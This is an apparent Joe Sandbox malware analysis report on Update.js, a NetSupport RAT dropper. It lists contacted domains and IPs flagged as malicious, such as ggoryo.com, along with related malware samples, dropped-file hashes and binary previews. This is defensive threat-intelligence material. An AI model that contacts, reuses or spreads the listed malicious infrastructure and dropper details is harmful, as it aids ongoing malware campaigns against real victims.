http://www.netsupportsoftware.com | powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe.8.dr | false | - | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000008.00000002.1738259741.0000026C1006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C01A34000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 00000008.00000002.1567156116.0000026C016AF000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
http://www.pci.co.uk/support | client32.exe, 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.dr | false | - | unknown
https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p | wscript.exe, 00000000.00000003.1366341815.000001FC53AFF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235146786.000001FC52487000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1348423839.000001FC57BD1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1243375949.000001FC518D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1234062822.000001FC52877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1236345430.000001FC53047000.00000004.00000020.00020000.00000000.sdmp, Update.js | false | - | unknown
https://www.google.com/intl/en-US/chrome/blank.html | wscript.exe, 00000000.00000003.1235146786.000001FC52487000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1348423839.000001FC57BD1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1355050587.000001FC57D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1234062822.000001FC52877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1236345430.000001FC53047000.00000004.00000020.00020000.00000000.sdmp, Update.js | false | - | unknown
http://%s/testpage.htmwininet.dll | powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.8.dr | false | - | unknown
http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s) | client32.exe, 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.dr | false | - | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000008.00000002.1567156116.0000026C018BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C016AF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ggoryo.com/s | wscript.exe, 00000000.00000003.1346975876.000001FC57274000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
http://www.pci.co.uk/supportsupport | client32.exe, 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.dr | false | - | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000008.00000002.1567156116.0000026C018BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C016AF000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
https://ggoryo.com/trade/da | wscript.exe, 00000000.00000003.1487288378.000001FC55788000.00000004.00000020.00020000.00000000.sdmp | true | - | unknown
https://go.micro | powershell.exe, 00000008.00000002.1567156116.0000026C00F61000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ocsp.thawte.com0 | powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe.8.dr | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 00000008.00000002.1567156116.0000026C01A34000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.mic | wscript.exe, 00000000.00000003.1346975876.000001FC5729F000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
http://geo.netsupportsoftware.com/location/loca.aspws | client32.exe, 0000000A.00000003.1532975213.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1527325191.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1524166542.0000000000F30000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1821012459.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1540191948.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://contoso.com/Icon | powershell.exe, 00000008.00000002.1567156116.0000026C01A34000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://127.0.0.1RESUMEPRINTING | client32.exe, 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.dr | false | - | unknown
https://ggoryo.com | powershell.exe, 00000008.00000002.1567156116.0000026C0139F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00229000.00000004.00000800.00020000.00000000.sdmp | true | - | unknown
http://%s/testpage.htm | powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.8.dr | false | - | unknown
http://127.0.0.1 | client32.exe, client32.exe, 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.dr | false | - | unknown
http://geo.netsupportsoftware.com/location/loca.aspwe | client32.exe, 0000000A.00000003.1532975213.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1527325191.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1524166542.0000000000F30000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1821012459.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1540191948.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
http://www.symauth.com/cps0( | powershell.exe, 00000008.00000002.1567156116.0000026C00BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00B9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BF8000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.8.dr, PCICHEK.DLL.8.dr, pcicapi.dll.8.dr, HTCTL32.DLL.8.dr, TCCTL32.DLL.8.dr, PCICL32.DLL.8.dr | false | URL Reputation: safe | unknown
https://ggoryo.com/ | wscript.exe, 00000000.00000003.1346975876.000001FC57274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1347982626.000001FC4FC26000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1346975876.000001FC5729F000.00000004.00000020.00020000.00000000.sdmp | true | - | unknown
https://ggoryo.com/trade/fix.php?6867EF | wscript.exe, 00000000.00000003.1347982626.000001FC4FC26000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://github.com/Pester/Pester | powershell.exe, 00000008.00000002.1567156116.0000026C018BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C016AF000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
http://%s/fakeurl.htm | powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.8.dr | false | - | unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0 | powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe.8.dr | false | URL Reputation: safe | unknown
http://www.symauth.com/rpa00 | powershell.exe, 00000008.00000002.1567156116.0000026C00BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00B9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BF8000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.8.dr, PCICHEK.DLL.8.dr, pcicapi.dll.8.dr, HTCTL32.DLL.8.dr, TCCTL32.DLL.8.dr, PCICL32.DLL.8.dr | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 00000008.00000002.1567156116.0000026C01A34000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000008.00000002.1738259741.0000026C1006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C01A34000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.google.com/intl/en-US/chrome/blank.htmlXVNT | wscript.exe, 00000000.00000003.1416060813.000001FC5443D000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
http://www.netsupportschool.com/tutor-assistant.asp11(L | client32.exe, 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.dr | false | - | unknown
https://aka.ms/pscore68 | powershell.exe, 00000008.00000002.1567156116.0000026C00001000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ggorxo.com/ | wscript.exe, 00000000.00000003.1347982626.000001FC4FC26000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000008.00000002.1567156116.0000026C00001000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.netsupportschool.com/tutor-assistant.asp | client32.exe, 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.dr | false | - | unknown
https://www-googleapis-staging.sandbox.google.com | wscript.exe, 00000000.00000003.1235146786.000001FC52487000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1388374479.000001FC55692000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1348423839.000001FC57BD1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1255625344.000001FC51AFE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1234062822.000001FC52877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1236345430.000001FC53047000.00000004.00000020.00020000.00000000.sdmp, Update.js | false | - | unknown
https://oneget.org | powershell.exe, 00000008.00000002.1567156116.0000026C016AF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ggoryo.com | powershell.exe, 00000008.00000002.1567156116.0000026C01667000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
https://ggoryo.com/0X | wscript.exe, 00000000.00000003.1347982626.000001FC4FC26000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
77.83.199.112 | ggoryo.com | Lithuania | - | 12679 | ASN-MOLMoscowRussiaRU | true
5.181.159.137 | unknown | Moldova Republic of | - | 39798 | MIVOCLOUDMD | true
104.26.1.231 | geo.netsupportsoftware.com | United States | - | 13335 | CLOUDFLARENETUS | false
                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                        Analysis ID:1529030
                                                                                                        Start date and time:2024-10-08 15:22:44 +02:00
                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                        Overall analysis duration:0h 8m 38s
                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                        Report type:full
                                                                                                        Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:14
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Update.js
Detection: MAL
Classification: mal100.rans.troj.expl.evad.winJS@6/28@2/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 57%
• Number of executed functions: 139
• Number of non-executed functions: 237
Cookbook Comments:
• Found application associated with file extension: .js
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: Update.js
Time | Type | Description
09:23:41 | API Interceptor | 45x Sleep call for process: powershell.exe modified
09:24:17 | API Interceptor | 5298842x Sleep call for process: client32.exe modified
Associated Sample Name / URL | Detection | Threat Name | Context
Match: 5.181.159.137
  update.js | malicious | NetSupport RAT | http://5.181.159.137/fakeurl.htm
  Update.js | malicious | NetSupport RAT | http://5.181.159.137/fakeurl.htm
Match: 104.26.1.231
  update.js | malicious | NetSupport RAT | geo.netsupportsoftware.com/location/loca.asp
  SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exe | malicious | NetSupport RAT | geo.netsupportsoftware.com/location/loca.asp
  upd_8707558.msix | malicious | NetSupport RAT | geo.netsupportsoftware.com/location/loca.asp
  Update.js | malicious | NetSupport RAT | geo.netsupportsoftware.com/location/loca.asp
  FakturaPDF.exe | malicious | NetSupport RAT | geo.netsupportsoftware.com/location/loca.asp
  Update 124.0.6367.158.js | malicious | NetSupport RAT | geo.netsupportsoftware.com/location/loca.asp
  Update 124.0.6367.158.js | malicious | NetSupport RAT | geo.netsupportsoftware.com/location/loca.asp
  SAPConcur.msix | malicious | NetSupport RAT | geo.netsupportsoftware.com/location/loca.asp
  HQuxVxuLV.ps1 | malicious | NetSupport RAT | geo.netsupportsoftware.com/location/loca.asp
  Advanced Scanner.exe | malicious | NetSupport RAT, NetSupport Downloader | geo.netsupportsoftware.com/location/loca.asp
Associated Sample Name / URL | Detection | Threat Name | Context
Match: geo.netsupportsoftware.com
  update.js | malicious | NetSupport RAT | 104.26.1.231
  qvoLvRpRbr.msi | malicious | NetSupport RAT | 104.26.0.231
  EMX97rT0GX.msi | malicious | NetSupport RAT | 104.26.0.231
  Support_auto.msi | malicious | NetSupport RAT | 104.26.0.231
  SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | malicious | NetSupport RAT | 104.26.0.231
  SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | malicious | NetSupport RAT | 172.67.68.212
  SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exe | malicious | NetSupport RAT | 104.26.1.231
  SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | malicious | NetSupport RAT | 172.67.68.212
  SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exe | malicious | NetSupport RAT | 172.67.68.212
  SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | malicious | NetSupport RAT | 104.26.0.231
Associated Sample Name / URL | Detection | Threat Name | Context
Match: ASN-MOL Moscow Russia RU
  yq5xNPpWCT.exe | malicious | PureLog Stealer, SystemBC | 80.64.217.93
  Form_Ver-00-26-49.js | malicious | Bazar Loader, BruteRatel, Latrodectus | 77.83.196.180
  vpn.msi | malicious | Bazar Loader, BruteRatel, Latrodectus | 77.83.196.180
  SecuriteInfo.com.FileRepMalware.3625.5069.msi | malicious | Bazar Loader, BruteRatel, Latrodectus | 77.83.196.180
  Form_Ver-14-00-21 (1).js | malicious | Bazar Loader, BruteRatel, Latrodectus | 77.83.196.180
  http://85.208.108.63/BST.msi | malicious | BruteRatel, Latrodectus | 77.83.196.180
  Form_Ver-13-59-03 (1).js | malicious | Bazar Loader, BruteRatel, Latrodectus | 77.83.196.180
  https://firebasestorage.googleapis.com/v0/b/namo-426715.appspot.com/o/PqA45bE7me%2FForm_Ver-11-58-52.js?alt=media&token=dc88189e-81de-49e9-879e-365bc76e3567 | malicious | BruteRatel, Latrodectus | 77.83.196.180
  Form_Ver-18-13-38.js | malicious | Bazar Loader, BruteRatel, Latrodectus | 77.83.196.180
  https://09358.princessandareilparrotsaviaries.com/ | malicious | Unknown | 192.101.68.115
Match: MIVOCLOUD MD
  lK1DKi27B4.dll | malicious | Unknown | 5.252.177.228
  lK1DKi27B4.dll | malicious | Unknown | 5.252.177.228
  update.js | malicious | NetSupport RAT | 5.181.159.137
  MRSPBASd65554AB.dll.dll | malicious | Unknown | 94.158.245.136
  MRSPBASd65554AB.dll.dll | malicious | Unknown | 94.158.245.136
  Update.js | malicious | NetSupport RAT | 5.181.159.137
  ZWlwrTM9HK.exe | malicious | Remcos | 5.181.156.117
  Gez0dmj6yl.exe | malicious | DCRat | 94.158.244.70
  update.js | malicious | NetSupport RAT | 5.181.159.28
  17E503AEF3804C0513838FB4AE3E00F323B1260BF753D99DBF0AE415BA54DE11.exe | malicious | Bdaejec, Raccoon | 194.180.191.241
Match: CLOUDFLARENET US
  Remittance_Raveis.htm | malicious | Unknown | 188.114.96.3
  osjCeEFNrF.exe | malicious | AgentTesla, PureLog Stealer | 104.26.13.205
  LYqMgahOY0.exe | malicious | AgentTesla | 172.67.74.152
  Iw7mPc6fCG.exe | malicious | AgentTesla | 104.26.12.205
  UyvVIyj7Ga.exe | malicious | Unknown | 162.159.136.232
  Request for Quotation Plug Valve.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
  3g833ZIrnA.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
  https://support.squarespacrenewel.retroestyle.com/?DTYUI0=RTDM45 | malicious | Unknown | 104.17.25.14
  file.exe | malicious | LummaC, Vidar | 104.21.53.8
  vD6qU34v9S.exe | malicious | AgentTesla | 104.26.13.205
Associated Sample Name / URL | Detection | Threat Name | Context
Match: 3b5074b1b5d032e5620f69f9f700ff0e
  osjCeEFNrF.exe | malicious | AgentTesla, PureLog Stealer | 77.83.199.112
  LYqMgahOY0.exe | malicious | AgentTesla | 77.83.199.112
  Iw7mPc6fCG.exe | malicious | AgentTesla | 77.83.199.112
  Request for Quotation Plug Valve.exe | malicious | Snake Keylogger, VIP Keylogger | 77.83.199.112
  3g833ZIrnA.exe | malicious | Snake Keylogger, VIP Keylogger | 77.83.199.112
  vD6qU34v9S.exe | malicious | AgentTesla | 77.83.199.112
  q6utlq83i0.exe | malicious | Unknown | 77.83.199.112
  103_25IBOT242790502_725597355.exe | malicious | Snake Keylogger, VIP Keylogger | 77.83.199.112
  Halkbank_Ekstre_20240508_074644_755730.pdf.exe | malicious | AgentTesla | 77.83.199.112
  PO-009 Compurent.exe | malicious | Snake Keylogger, VIP Keylogger | 77.83.199.112
Match: 37f463bf4616ecd445d4a1937da06e19
  file.exe | malicious | Clipboard Hijacker, Stealc, Vidar | 77.83.199.112
  file.exe | malicious | LummaC, Vidar | 77.83.199.112
  Transferencia 10-7-2024.exe | malicious | FormBook, GuLoader | 77.83.199.112
  ZAMOWIEN.EXE.exe | malicious | AgentTesla, GuLoader | 77.83.199.112
  ZAMOWIEN.EXE.exe | malicious | AgentTesla, GuLoader | 77.83.199.112
  Contrato de Cesin de Crditos Sin Recurso.exe | malicious | GuLoader, Snake Keylogger | 77.83.199.112
  7AeSqNv1rC.exe | malicious | MicroClip, Vidar | 77.83.199.112
  VmRHSCaiyc.exe | malicious | LummaC, Vidar | 77.83.199.112
  M13W1o3scc.exe | malicious | Stealc | 77.83.199.112
  rPedidoactualizado.exe | malicious | GuLoader, Snake Keylogger | 77.83.199.112
Associated Sample Name / URL | Detection | Threat Name
Match: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\PCICHEK.DLL
  update.js | malicious | NetSupport RAT
  Update.js | malicious | NetSupport RAT
  update.js | malicious | NetSupport RAT
  updates.js | malicious | NetSupport RAT
  updates.js | malicious | NetSupport RAT
  Update 124.0.6367.158.js | malicious | NetSupport RAT
  updates.js | malicious | NetSupport RAT
  Update 124.0.6367.158.js | malicious | NetSupport RAT
  Update_124.0.6367.158.js | malicious | NetSupport RAT
  MDE_File_Sample_c035ea05c53efc10b65ede03b5550188cbb2e484.zip | malicious | NetSupport RAT
Match: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\HTCTL32.DLL
  update.js | malicious | NetSupport RAT
  Update.js | malicious | NetSupport RAT
  update.js | malicious | NetSupport RAT
  updates.js | malicious | NetSupport RAT
  updates.js | malicious | NetSupport RAT
  Update 124.0.6367.158.js | malicious | NetSupport RAT
  updates.js | malicious | NetSupport RAT
  Update 124.0.6367.158.js | malicious | NetSupport RAT
  Update_124.0.6367.158.js | malicious | NetSupport RAT
  MDE_File_Sample_c035ea05c53efc10b65ede03b5550188cbb2e484.zip | malicious | NetSupport RAT
Process: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe
File Type: ASCII text, with no line terminators
Category: modified
Size (bytes): 16
Entropy (8bit): 3.077819531114783
Encrypted: false
SSDEEP: 3:llD:b
MD5: C40449C13038365A3E45AB4D7F3C2F3E
SHA1: CB0FC03A15D4DBCE7BA0A8C0A809D70F0BE6EB9B
SHA-256: 1A6B256A325EEE54C2A97F82263A35A9EC9BA4AF5D85CC03E791471FC3348073
SHA-512: 3F203E94B7668695F1B7A82BE01F43D082A8A5EB030FC296E0743027C78EAB96774AB8D3732AFE45A655585688FB9B60ED355AEE4A51A2379C545D9440DC974C
Malicious: false
Reputation: moderate, very likely benign file
Preview: 40.7357,-74.1724
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 19012
Entropy (8bit): 5.502916693653022
Encrypted: false
SSDEEP: 384:u8kjr8ZMuAh/AJ2t696XNqabssp2eqf05hETwOpx4toaxfbh69xy:/Wr0MI2EcXNqaBAeD7MxSbhj
MD5: B5298407D93E2FCF0383361D9C1AFCC3
SHA1: BD3CC4A674F9BD018B234F2139E78649971E1EBE
SHA-256: 2D121F444144E69334A70EC069987CEB317DA63A57646AB6BA830BD4498B24EC
SHA-512: 2460497C5335D5C2A142AD78DA7631A188486BAB10330DC502D712C5307FA5CB8D28E98632C5520B6D0F2EC4C38A2924AE04AEABEE30091F7820FE1C49DDB4BC
Malicious: false
Reputation: low
                                                                                                                                                Preview:@...e...............#................................@..........H...............o..b~.D.poM...3..... .Microsoft.PowerShell.ConsoleHostD...............4..7..D.#V.....`.......System.Management.Automation0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.4.................%...K... ...........System.Xml..@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4...............&.QiA0aN.:... .G........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...D....................+.H..!...e........System.Configuration.Ins
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2359638
                                                                                                                                                Entropy (8bit):7.997512736663703
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:49152:a51ZlWlEDThXBJOhHvh6J6h2SFFGf0RBNTQfYc9jh23eWeB3/YSBm7WIqRRakTSs:E17FXa/hRFY89YYc9jh23redpmQRv
                                                                                                                                                MD5:7A5CC8DC4397674526B773D3BF4669D3
                                                                                                                                                SHA1:4F0576E5406DA1B476E070E1AF6C1A6DC616112E
                                                                                                                                                SHA-256:98EC780E46CD137C3C88CA3403063525C037196840092FF58309F74A82851849
                                                                                                                                                SHA-512:36A4918069718E6B30E5E69E4B63C0FD03BB573BAFEBE25EF50D38589C6641D1468A6B518C28B0B9CC0FE859EF6A9590919CDE9A36022C506B4908DA7BAF6701
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK.........DWW..%.&l..........client32.exe.|.xT.....N..".R....A.W..@........Tj.$...Q.@... ...7!...@..iJ.......;3....R..~.....;g...3gfnx...T.@......b../....d.@...n{...ts....5d.....]%.i..v...:3lZ..i]G.9v.:...\__...F.).C....(..B..t..P.f....&..9..e.k9.:.K.X...8..`.@...Oph.@W...B.p....N.]A.....A^...!..Y..T...+..t........`..KUg.....`..]w..=k...g...7.......4<..=f..|..8T.."...z..:..ae>s.L.(....f.U.%=.).Iq.....T..px-..8G.G...`8.>{#.=....&B..G..)t........uY:R0..C.....C.........G......1r.e..K5HMop..ZJ..6.&...fM.........m....G..W.I0....hb.."NDS5...>MTz-.".i.....v..[..JC.dC........^4....4.W.U.SZ.'..........O...C.O.+..X...Cs.)S.L`3'8t.....Y..Te....~aS.G...M......9..g......0}.|-.;..N%....Hi......$.....kC..t..`..,..!&..X..$.6k..v....o_.I.......x......?_..'.A..../`S.b...u.].....t..9.6...g.l..|.2...Nte.}.N....]........)d..Q{.>g.p?G.O...g.......S.Z*.-.....^.......[......V..i...V.oh.~l+......R9.}W.F..q....4...._`G.CK..u.@l.....7l.W/..b.&... H.1..I.........
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):328056
                                                                                                                                                Entropy (8bit):6.7547459359511395
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:Hib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OKB:Hib5YbsXioEgULFpSzya9/lY5SilQCfR
                                                                                                                                                MD5:C94005D2DCD2A54E40510344E0BB9435
                                                                                                                                                SHA1:55B4A1620C5D0113811242C20BD9870A1E31D542
